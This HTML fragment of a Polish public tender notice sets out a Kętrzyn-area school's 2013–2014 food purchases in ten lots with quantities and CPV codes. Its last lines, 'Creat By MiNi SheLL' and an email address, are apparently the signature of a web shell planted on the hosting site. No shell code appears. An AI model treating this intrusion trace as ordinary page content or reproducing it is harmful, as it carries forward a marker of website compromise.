e) pełnomocnictwo dla osoby, występującej w imieniu wykonawcy, uwzględniające szczegółowy zakres i okres obowiązywania, wskazujące, że osoba posiada uprawnienia do podpisywania zobowiązań w imieniu wykonawcy- (jeżeli zostało udzielone).Pełnomocnictwo legitymuje pełnomocnika do wykonywania czynności prawnych w imieniu mocodawcy, zatem jego zakres i okres obowiązywania powinien być wyraźnie i precyzyjnie określony.
f) pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o zamówienie w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, podpisane przez wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia, w tym ustanowionego wykonawcę - pełnomocnika (w przypadku wykonawców wspólnie ubiegających się o zamówienie) - do pełnomocnictwa należy dołączyć dokumenty potwierdzające, że osoby podpisujące pełnomocnictwo są uprawnione do składania oświadczeń woli w imieniu danego wykonawcy,</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.karolewo.fc.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ZESPÓŁ SZKÓŁ CENTRUM KSZTAŁCENIA ROLNICZEGO W KAROLEWIE
Karolewo 13 11-400 Kętrzyn pok. 100 sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.08.2013 godzina 13:00, miejsce: ZESPÓŁ SZKÓŁ CENTRUM KSZTAŁCENIA ROLNICZEGO W KAROLEWIE
Karolewo 13 11-400 Kętrzyn pok. 100 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przyprawy sypkie i różne produkty spożywcze..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru	Jednostka miary	Planowana ilość
1	Ziele angielskie 20g	szt	320
2	Majeranek 20g	szt	85
3	Lisic laurowy 12 g	szt	193
4	Czosnek granulowany 20g	szt	55
5	Zioła prowansalskie 10g	szt	82
6	Pieprz naturalny mielony 20g	szt	288
7	Pieprz ziołowy 20g	szt	320
8	Kwasek cytrynowy 20g	szt	752
9	Cynamon mielony 20g	szt	20
10	Tymianek 10g	szt	82
11	Bazylia 10g	szt	65
12	Rozmaryn10g	szt	10
13	Oregano 10g	szt	31
14	Mąka ziemniaczana opakowanie torba papierowa 0,5kg	kg	25
15	Magii, opakowanie butelka szklana o pojemności 210g	szt	58
16	Przyprawa solno - warzywna typu Vegeta200g	szt	160
17	Przyprawa do ryb typu Delikat opakowanie puszka plastik o pojemności 600g	szt	18
18	Przyprawa do mięsa typu Delikat opakowanie puszka plastik o pojemności 700g	szt	18
19	Przyprawa do kurczaka typu Delikat opakowanie puszka plastik o pojemności 600g	szt	18
20	Koncentrat buraczany, opakowanie butelka szklana o pojemności 0,25l	szt	50
21	Aromat do ciasta	szt	10
22	Ketchup łagodny typu Pudliszki. Łowicz opakowanie butelka plastik o pojemności 480g	szt	276
23	Sol gruba z mikroelementami opakowanie folia o pojemności 1kg	szt	390
24	Kawa zbożowa instant opakowanie kartonik o pojemności 250g	szt	50
25	Herbata liściasta opakowanie folia o pojemności 100g	szt	385
26	Kakao naturalne , opakowanie kartonik o pojemności 150g	szt	50
27	Majonez 0,9 kg typu Kętrzyński 	szt	136
28	Makaron 0,5kg typu Lubella	szt	375
29	Cukier 1kg	kg	1140
30	Kasza jęczmienna pakowana 4x100g	op	102
31	Kasza gryczana pakowana 4x100g	op	164
32	Mąka pszenna typ 550 opakowanie torba papier o pojemności 1kg	kg	680
33	Płatki kukurydziane opakowanie torba folia o pojemności 0,5kg	szt	80
34	Ryz długoziarnisty kl I opakowanie torba papierowa o pojemności 1kg	kg	250
35	Olej 1l słonecznikowy 	szt	180
36	Olej 5l	szt	200
37	Koncentrat pomidorowy typu Łowicz, Pudliszki 0,9l	szt	176
38	Groszek konserwowy 460g	szt	150
39	Ogórki konserwowe 0,9l	szt	200
40	Ananas konserwowy	szt	60
41	Seler konserwowy opakowanie szklane o pojemności 350g	szt	50
42	Kukurydza konserwowa 400g	szt	150
43	Fasolka konserwowa biała 400g	szt	50
44	Szczaw konserwowy 0,9l	szt	20
45	Brzoskwinia puszka 	szt	35
46	Chrzan słoiczek 180g	szt	28
47	Cukierki mieszanka pakowane w kartonik 3kg	op	4
48	Cukier wanilinowy 32g	szt	15
49	Czekolada z orzechami laskowymi100g	szt	600
50	Dżem wieloowocowy niskosłodzony 270g	szt	523
51	Galaretka owocowa opakowanie torba folia 1kg	szt	17
52	Kasza jęczmienna 0,5kg 	szt	120
53	Kminek 20g	szt	20
54	Kompot wieloowocowy 0,9l	szt	112
55	Makaron nitka 3 kg	szt	40
56	Makaron gwiazdka 3kg	szt	10
57	Makaron kokardka 3kg	szt	40
58	Marmolada 0,9l	szt	70
59	Majonez 0,5l typu Kętrzyński	szt	78
60	Musztarda butelka plastik o, 25l	szt	40
61	Oliwa z Oliwek tłoczona na zimno opakowanie butelka szklana 1l	szt	25
62	Papryka słodka 20g	szt	100
63	Papryka ostra20g	szt	100
64	Płatki zbożowe czekoladowe 0,5kg	szt	100
65	Sos ogrodowy puszka typu Knorr	szt	8
66	Sos słodko - kwaśny typu Łowicz 0,9l	szt	50
67	Sos węgierski opakowanie puszka 1kg, dozowanie 120g l, wydajność 10l	szt	10
68	Woda mineralne gazowana 1,5l	szt	200
69	Krem czekoladowy 350g	szt	100
70	Kisiel 1kg	szt	20
71	Fix słodko-kwaśny 	szt	20
72	Fasolka czerwona puszka	szt	60
73	Margaryna Planta	szt	50
74	Mini kostka rosołowa	szt	50
75	Miód 460g	szt	50
76	Płatki kukurydziane typu Nesqik 500g	szt	100
76	Sok Kubuś 0,7l	szt	200
77	Sos czekoladowy do deserów 1l	szt	20
78	Baton czekoladowy 55g typu Mars 	szt	650
79	Fasola drobna paczka 5kg	Kg	250
80	Groch łupany paczka 5kg	Kg	150
81	Włoszczyzna suszona	Szt 	26
82	Zupa Żurek 1 kg	Szt	5
83	Zupa Barszcz biały 1kg	Szt	5
84	Rosół drobiowy1kg opakowanie wiaderko plastik	Szt	15
85	Migdały opakowanie folia 100g	Szt	30
86	Ziarna dynia opakowanie folia 100g	Szt	30
87	Ziarna słonecznik opakowanie folia 100g	Szt	30
			
88	  Placki ziemniaczane w proszku typu KNORR 1,5 kg	szt	80
89	Grzanki opakowanie 1 kg	szt	10
90	Sos borowikowy typu KNORR	szt	10
91	Cebulka prażona 0,5 kg	szt	100
92	Kakao rozpuszczalne 	szt	30
93	Powidła śliwkowe 270g	szt	50
94	Przyprawa do ziemniaków	szt	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Warzywa, owoce przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa towaru	Jednostka miary	Planowana ilość
1	Cebula biała, opakowanie w workach o pojemności 10 kg, świeża bez szczypioru, nienadmarznięta, bez uszkodzeń mechanicznych	Kg	720
2	Por czysty ,świeży	Kg	87
3	Marchew myta, świeża nienadmarznięta kl I	Kg	700
4	Pietruszka korzeń czysta myta, nienadmarznięta kl I	Kg	180
5	Seler korzeń czysty świeży nienadmarznięty	Kg	180
6	Burak czerwony czysty bez uszkodzeń mechanicznych, nienadmarznięty	Kg	750
7	Rzodkiewka - pecz czysta bez uszkodzeń mechanicznych	Szt	120
8	Kapusta biała główka 2-3 kg beż uszkodzeń mechanicznych, nienadmarznięta kl I	Szt	600
10	Kapusta biała młoda  główka o wadze 2-3 kg bez uszkodzeń mechanicznych nienadmarznięta kl I	Kg	840
11	Koper zielony świeży - pęczki kl I	Szt	100
12	Kapusta kwaszona opakowanie wiaderko plastikowe o pojemności 5 kg	Szt 	200
13	Kalafior biały świeży, czysty nienadmarznięty kl I	Szt	150
14	Kapusta czerwona, nienadmarznięta bez uszkodzeń mechanicznych, pakowana w worek o wadze 10 kg	Kg	595
15	Kapusta pekińska nienadmarznięta, bez uszkodzeń kl I opakowanie w w workach 5 kg	Kg	300
16	Natka pietruszki, czysta, pakowana w pęczki kl I	Szt	400
17	Ogórek świeży , kl I	Kg	560
18	Papryka czerwona świeża kl I nienadmarznięta kl I	Kg	100
19	Szczypior czysty świeży pakowany w pęczki	Szt	150
20	Sałata lodowa ,masłowa l I	Szt	400
21	Pieczarka biała świeża kl I	Kg	90
22	Grzyby suszone opakowanie folia 2 g	Szt 	50
23	Ogórki kwaszone opakowanie wiaderko 3kg	Szt 	150
24	Pomidor czerwony, klI, świeży nienadmarznięty, bez uszkodzeń mechanicznych	Kg	650
25	Ziemniaki, opakowanie worek o pojemności 10 kg nie zzieleniałe czyste, suche kl I  irga	Kg	12800
26	Cebula czerwona opakowanie worek 5kg 	Kg	150
27	Cukinia świeża 	Kg	80
28	Czosnek główka czysty , bez uszkodzeń kl I	Szt	71
29	Żurawina suszona opakowanie folia 1 kg	Kg	50
30	Kapusta wloska	kg	150
	Nazwa produktu spożywczego	Jednostka miary	Ilość
	OWOCE - kod 15300000-1		
31	Jabłka kruche,słodkie,czyste nienadmarznięte bez śladów uszkodzeń opakowanie skrzynka drewniana 15 kg	Kg	1440
32	Banany opakowanie karton 36 kg	op	94
33	Cytryna, 	Kg	90
34	Mandarynki	Kg	800
35	Gruszki	Kg	800
36	Pomarańcze	Kg	800
37	Nektarynki - kosz 	Op	150
38	Kompot 0,9l	Szt	80
39	Truskawki świeże, opakowanie łubianka o poj 2,5kg	Szt	90
40	Brzoskwinie 	Kg	300
41	Kiwi	Kg	300
42	Rodzynki	Szt	30
43	Winogrona 	Op	40
44	Śliwka suszona	Szt	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pieczywo i świeże wyroby piekarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa towaru	Jednostka miary	Planowana ilość
1	Chleb razowy z dynią krojony opakowanie folia 0,5 kg	Szt	380
2	Bułki zwykłe, masa50g	Szt	2700
3	Bułki kajzerki ,masa 30g	Szt	4430
4	Bułki grahamki, masa 30g	Szt	740
5	Bułka z ziarnem, masa 30g	Szt	1250
6	Chleb zwykły krojony opakowanie folia0,6kg	Szt	4305
7	Bułka z nadzieniem, różnym	Szt	1200
8	Bułka tarta 0,5 kg	Szt	980
9	Bułka drożdżowa 0,5 kg	Szt	250
10	Bagietka mała	Szt	350.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dania gotowe - świeże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp	Nazwa towaru	Jednostka miary	Planowana ilośc
1	Kartacze z mięsem	kg	300
2	Pierogi z twarogiem, truskawką	kg	150
3	Pierogi wiejskie z miesem wieprzowym, ziemniakami	kg	300
4	Pierogi z kapustą i grzybami	kg	200
5	Uszka z miesem wieprzowo - wolowym	kg	150
6	Kopytka 	kg	250
7	Kopytka ze szpinakiem	kg	250.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.89.43.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Jaja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Jaja kurze, kategoria wagowa XL 70-75 g, nie myte, nie popękane, termin ważności nie mniej niż 7 dni od daty dostawy, opakowanie jednorazowe - pakowane po 10 szt - 980 opakowań.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Mleko i jego przetwory.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru	Jednostka miary	Jednostka planowana
1	Twaróg półtłusty 250g zaw. tł.3,5%.Termin przydatności nie krótszy niż 7 dni od daty dostawy	Szt	457
2	Ser twardy zaw. tł 45%. Termin przydatności nie krótszy niż 30 dni od daty dostawy.	Kg	350
3	Ser topiony krążki op. 200g	Op	325
4	Ser topiony plastry op. 150g	op	325
5	Serek wiejski granulowany 150g.Termin przydatności nie krótszy niż 7 dni od daty dostawy	Szt	570
6	Ser typu Feta 	Szt	80
7	Masło extra zaw. tł 82% 200g.Termin przydatności nie krótszy niż 14 dni od daty dostawy.	Kg	600
8	Mleko opakowanie karton 1l zaw. tł 2%	Szt	1280
9	Śmietana 400g zaw. tł.18% .Termin przydatności nie krótszy niż 7 dni od daty dostawy.	Szt	800
10	Twaróg mielony naturalny wiaderko 1 kg 	Szt	92
11	Jogurt kubek 150g owocowy z widocznymi kawałkami owoców. Zawartość tl. od 0 - 1,5%. Termin przydatności nie krótszy niż 5 dni od daty dostawy.	Szt	1968
12	Jogurt Drink owocowy do picia	Szt	800
13	Serek homogenizowany o różnych smakach 150g.Termin przydatności nie krótszy niż 5 dni od daty dostawy 	Szt 	520
14	Ser Zotarella	Szt 	90
15	Rolada ustrzycka 	kg	50
16	Śmietanka 30% 1 l	Szt	60
17	Jogutr naturalny  400 g	Szt	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Mrożonki warzywne, ryby mrożone wędzone, konserwy rybne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa produktu	Jednostka miary	Jednostka planowana
1	Kalafior różyczka , opakowanie torba folia 2,5kg	Szt	80
2	Brokuł różyczka, opakowanie torba folia 2,5kg	Szt	80
3	Fasolka szparagowa cięta , opakowanie torba folia 2,5kg	Szt	120
4	Fasola szparagowa cała , opakowanie torba folia 2,5kg	Szt	60
5	Brukselka opakowanie torba folia 2,5kg	Szt	30
6	Mieszanka warzywna 7 składnikowa ,opakowanie torba folia2,5kg	Szt	80
7	Mieszanka warzywna trzy- składnikowa opakowanie torba foliowa 2,5kg	Szt	80
8	Mieszanka kompotowa wieloowocowa opakowanie torba folia 2,5kg	Szt	580
9	Podgrzybki mrożone folia 2,5 kg	Szt	40
10
	Kurki mrożone op. folia 2,5 kg	Szt	10
11	Frytki mrożone op. folia2,5 kg	Szt	10
	RYBY MROŻONE, WEDZONE, KONSERWY RYBNE kod - 152		
12	Filet tilapia, sola, dorsz - kl I pakowane karton  5 - 10 kg	kg	650
13	Makrela wędzona pakowana karton 3 kg	szt	150
14	Śledź plat marynowane, wiaderka 3 kg	Szt	60
15	Śledź małosolny wiaderko 4 kg 	Szt	10
16	Śledź rolmops wiaderka 3 kg 	Szt	10
17	Tuńczyk w oleju 160g	Szt	120
18	Sałatka rybna Neptun 160g	Szt	120
19	Śledź koreczki 	szt	60
20	Sałatka rybna - paprykarz 300g	Szt	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ciasto.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru	Jednostka miary	Jednostka planowana
1	Babeczki -mufinki	Szt	2200
2	Ciasto pieczone	Kg	160
3	Ciasta kruche pieczone	Kg	160
4	Ciasta śmietankowe	Kg	160
5	Pączki	Szt	540.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.22.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Mięso wieprzowe, wołowe, podroby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru	Jednostka miary	Jednostka planowana
1	Schab środkowy bez skóry i bez kości	Kg	570
2	Mięso wieprzowe od kości szynki bez skóry i kości	Kg	250
3	Mięso wieprzowe bez skory i bez kości	Kg	230
4	Mięso mielone wieprzowe kl. I	Kg	690
5	Żeberka wieprzowe cięte	Kg	250
6	Wątroba wieprzowa	Kg	160
7	Mięso mielone wołowe	Kg	80
8	Słonina surowa bez skory	Kg	50
9	Smalec	Kg	300
10	Pręga wołowa	kg	30
11	Flak wołowy cięty 	kg	50
12	Golonka wieprzowa przednia 	kg	80
13	Pachwina wieprzowa	kg	50
14	Podgardle wieprzowe	kg	60
15	Boczek surowy	kg	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.11.10.00-9, 15.11.40.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Mięso drobiowe, wędliny, wieprzowe, wołowe, konserwy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa towaru	Jednostka miary	Planowana ilość
1	Ćwiartka kurczaka	Kg	650
2	Filet drobiowy bez skory i kości	Kg	480
3	Noga kurczaka	Kg	250
4	Korpusy z kurczaka ze skrzydełkiem	kg	500
5	Szyje indycze 	kg	20
6	Filet z indyka	kg	120
7	skrzydełka	kg	150
	WĘDLINY - kod 15131130-5		
8	Filet wędzony z indyka	Kg 	80
9	Blok mięsny	kg	30
10	Kaszanka	Kg	180
11	Kiełbasa z karczmy	kg	70
12	Kiełbasa zwyczajna	Kg 	90
13	Kiełbasa podwawelska	Kg	120
14	Kiełbasa staropolska	Kg	20
15	Kiełbasa biała parzona	Kg	100
16	Konserwa mięsna 300g - typu gulasz angielski	Szt	300
17	Krakowska sucha	Kg	50
18	Karczek opiekany 	Kg	80
19	Mortadela drobiowa	Kg	115
20	Ogonówka z kotła	Kg	40
21	Łopatka pieczona	Kg	40
22	Parówka domowe	Kg	260
23	Pasztet 0,50 g 	Szt	600
24	Pasztet pieczony z indyka	Kg	100
25	Pierś opiekana z indyka opakowanie folia	Kg	60
26	Pierś wędzona z indyka opakowanie folia	Kg	50
27	Podgardla wędzone 	Kg	20
28	Polędwica miodowa opakowanie folia o pojemności 1,5 - 2 kg	Kg 	45
29	Schab kasztelański opakowanie folia o pojemności 1,5 - 2 kg	Kg	30
30	Schab krotoszyński opakowanie folia o pojemności 1,5 - 2 kg	Kg 	30
31	Schab cygański opakowanie folia o pojemności 1,5 - 2kg	Kg	65
32	Schab z pieca opakowanie folia o pojemności 1,5 - 2 kg	Kg	45
33	Serdelki bydgoskie opakowanie folia 	Kg 	150
34	Polędwica sopocka opakowanie folia o pojemności 1,5 - 2kg	Kg	50
35	Szynka staropolska opakowanie folia o pojemności 1,5 - 2 kg	Kg	40
36	Szynka domowa opakowanie folia o pojemności 1,5 - 2 kg	Kg	30
37	Szynka Mistrza Jana opakowanie folia o pojemności 1,5 -2 kg	Kg
	60
38	Szynka kasztanowa opakowanie folia o pojemności 1,5 - 2 kg	Kg	80
39	Szynka wędzona opakowanie folia o pojemności 1,5 - 2 kg	Kg	30
40	Szynka od zawsze opakowanie folia o pojemności 1,5 - 2 kg	Kg	30
41	Szynka Trójkąt opakowanie folia o pojemności 1,5 - 2 kg	Kg	20
42	Udziec wędzony z kurczaka opakowanie folia o pojemności 1,5 - 2 kg	Kg	28
43	Tyrolska opakowanie folia o pojemności 1,5 -2kg	Kg	50
44	Wędzonka mazurska opakowanie folia o pojemności 1,5 - 2 kg	Kg	30
45	Wieprzowina biała opakowanie folia o pojemności 1,5 - 2 kg	Kg	30
46	Boczek wędzony	kg	40
47	Kaszanka	kg	180
48	Baleron gotowany	kg	30
49	Kindziuk Litewski	kg	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.13.11.30-5, 15.13.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com